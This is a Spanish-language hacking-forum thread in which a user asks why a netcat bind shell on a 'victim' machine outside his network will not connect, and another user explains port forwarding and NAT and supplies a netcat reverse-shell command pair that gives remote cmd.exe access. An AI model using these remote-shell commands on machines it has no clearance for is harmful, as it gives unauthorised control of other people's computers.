elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  net cat no me funciona fuera de mi red
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: net cat no me funciona fuera de mi red  (Leído 3,740 veces)
bsosa

Desconectado Desconectado

Mensajes: 12


Ver Perfil
net cat no me funciona fuera de mi red
« en: 19 Diciembre 2011, 21:00 pm »

Hola a todos.

Bueno para empezar les comento que estoy tratando de dejar a la escucha a otra maquina (con autorización)  fuera de mi red local osea de otro lugar y diferente proveedor de internet. yo coloco el comando para lograr de esta manera nc -L -d -e cmd.exe -p 5777 y automaticamente queda a la escucha de conexiones en ese puerto.
Pero cuando desde mi maquina coloco la dirección IP de la maquina(victima), simplemente nada. No logro conectar. El comando que utilizo para conectarme es nc xx.xx.xxx.x 5777

Asiendo el mismo procedimiento en mi red local de 3 maquinas, no tengo ningun problema en conecatarme con la que este a la escucha ya sea el puerto 21,25,80 etc. cosa distinta con la victima ya que no me funciona en ningun puerto.

Sera que me pueden ayudar explicandome el porque pasa esto y que debo hacer para lograr conectarme con la maquina que esta fuera de la red pero con

Muchas gracias.
En línea

DameBanda

Desconectado Desconectado

Mensajes: 65


Hollywood Whore


Ver Perfil
Re: net cat no me funciona fuera de mi red
« Respuesta #1 en: 19 Diciembre 2011, 21:16 pm »

Asegurate de esto:

Tienes abierto el puerto 5777 en el router (si lo usas)

La maquina que esta a la escucha tiene una excepción para permitir que el netcat abra el puerto

Te conectas a la maquina con su ip pública

Estos son los errores mas comunes.

Tambien puedes provar a usar una shell inversa:

Código:
nc -vv -l -p 5777
esto lo ejecutas en tu pc
Código:
nc -d -e cmd.exe T.U.I.P 5777
esto en el de la "victima"

Si siges sin poder conectarte ya nos cuentas  ;)
Espero haberte ayudado.
En línea

"Amarillo, pensó" Douglas Adams




[img]http:/
bsosa

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: net cat no me funciona fuera de mi red
« Respuesta #2 en: 19 Diciembre 2011, 22:00 pm »

ok, lo intentare de esa manera

Pero no entido la opcion que me diste de verificar si la maquina tiene excepcion para permitir que abra el puerto. como veo esto?

Y te hago otra observación. la maquina (victima tiene internet por medio de un rowter y la maquina tiene el fireware desactivado y mi maquina esta con otro proveedor distinto pero en Wireles Modem USB.

Crees que existe la posibilidad de que esten bloqueados los puertos directamente por los proveedores de internet como lo es el puerto 21 o 25 u cualquier otro.
tengo entendido que ente caso tendria que hacer un redireccionamiento de puerto pero antes de meterme hacerlo probare las opciones que me indicastes.

Gracias.
En línea

bsosa

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: net cat no me funciona fuera de mi red
« Respuesta #3 en: 30 Diciembre 2011, 19:10 pm »

Hola Damebanda.

Te comento que con respecto al netcat.. la maquina victima tiene internet por medio de ADSL y su direccion ip empieza asi: 192.168.xx.xx. tengo entendido que este tipo de direcciones son privadas y el rowter posee la publica, por lo cual no podre acceder a ella. =(

Tienes alguna idea de como puedo hacer en este caso xq la mayoria de maquinas de mis amigos son por medio de Rowter ADSL... yo soy el unico que tengo por medio de UBS wireles el cual si es Publico.

Espero tus comentarios ya que no quiero dejar este tema abandonado...
En línea

DameBanda

Desconectado Desconectado

Mensajes: 65


Hollywood Whore


Ver Perfil
Re: net cat no me funciona fuera de mi red
« Respuesta #4 en: 4 Enero 2012, 14:48 pm »

A ver: bsosa. Primero siento no haberte podido responder antes.

Citar
Pero no entido la opcion que me diste de verificar si la maquina tiene excepcion para permitir que abra el puerto. como veo esto?

Me refiero a que si el servidor (maquina en la que escuchas) tiene firewall debes añadir la excepcion.

Citar
Y te hago otra observación. la maquina (victima tiene internet por medio de un rowter y la maquina tiene el fireware desactivado y mi maquina esta con otro proveedor distinto pero en Wireles Modem USB.

What?, fireware por lo que tengo entendido es el estandar de transmision de datos de apple. Supongo que te refieres al firewall, si lo tienes desactivado en el servidor olvidate de la primera respuesta  ;-)  ;-)  ;-)

A ver, si esta bajo router igual tiene mil cosas que evitan que escuche un puerto, si tienes acceso fisico a la pc o al router mucho mejor, en principio abre el puerto que vallas a escuchar en el router.

Citar
Crees que existe la posibilidad de que esten bloqueados los puertos directamente por los proveedores de internet como lo es el puerto 21 o 25 u cualquier otro.

Posible: Si, Probable: En absoluto.
Si tienes tu router con tu LAN ahi nadie te va a tocar, en que les beneficiaria a ellos?. Si el ISP es de pago no creo que tengas ese problema. Y si ya dandose el caso de que tengas bloqueado un puerto, y que curiosamente sea el 5777.
No creo que te cueste cambiar el numero. xD

Citar
la maquina victima tiene internet por medio de ADSL y su direccion ip empieza asi: 192.168.xx.xx.

Esa ip solo sirve para comunicar pcs en LAN y si no estais bajo el mismo router no te servira  para nada.

Citar
tengo entendido que este tipo de direcciones son privadas y el rowter posee la publica, por lo cual no podre acceder a ella. =(

Da igual que las tenga el router, el mismo envia tu ip publica cada vez que conectas con un servidor web. (por poner un ejemplo).

Tu ip real puedes verla escribiendo en google "cualesmiip"  ;)
O si quieres desde la linea de comandos conectando a un servidor telnet o smtp publico y ejecutando el comando "EHLO".

Citar
Tienes alguna idea de como puedo hacer en este caso xq la mayoria de maquinas de mis amigos son por medio de Rowter ADSL... yo soy el unico que tengo por medio de UBS wireles el cual si es Publico.

Creo que esto ya queda respondido  ;)

De nuevo espero haberte ayudado
Salu2
En línea

"Amarillo, pensó" Douglas Adams




[img]http:/
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como funciona el envio de datos internet y fuera de el? « 1 2 »
Dudas Generales
$Edu$ 13 7,881 Último mensaje 10 Octubre 2011, 22:51 pm
por $Edu$
¿Hay alguien ahí fuera? « 1 2 »
Foro Libre
El_Andaluz 16 6,126 Último mensaje 28 Diciembre 2015, 03:37 am
por El_Andaluz
PC fuera de RED « 1 2 »
Hardware
PETTETE 10 5,451 Último mensaje 4 Marzo 2017, 14:12 pm
por Randomize
Sockets fuera de LAN.
Java
footer 5 2,819 Último mensaje 11 Abril 2022, 16:51 pm
por sapito169
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines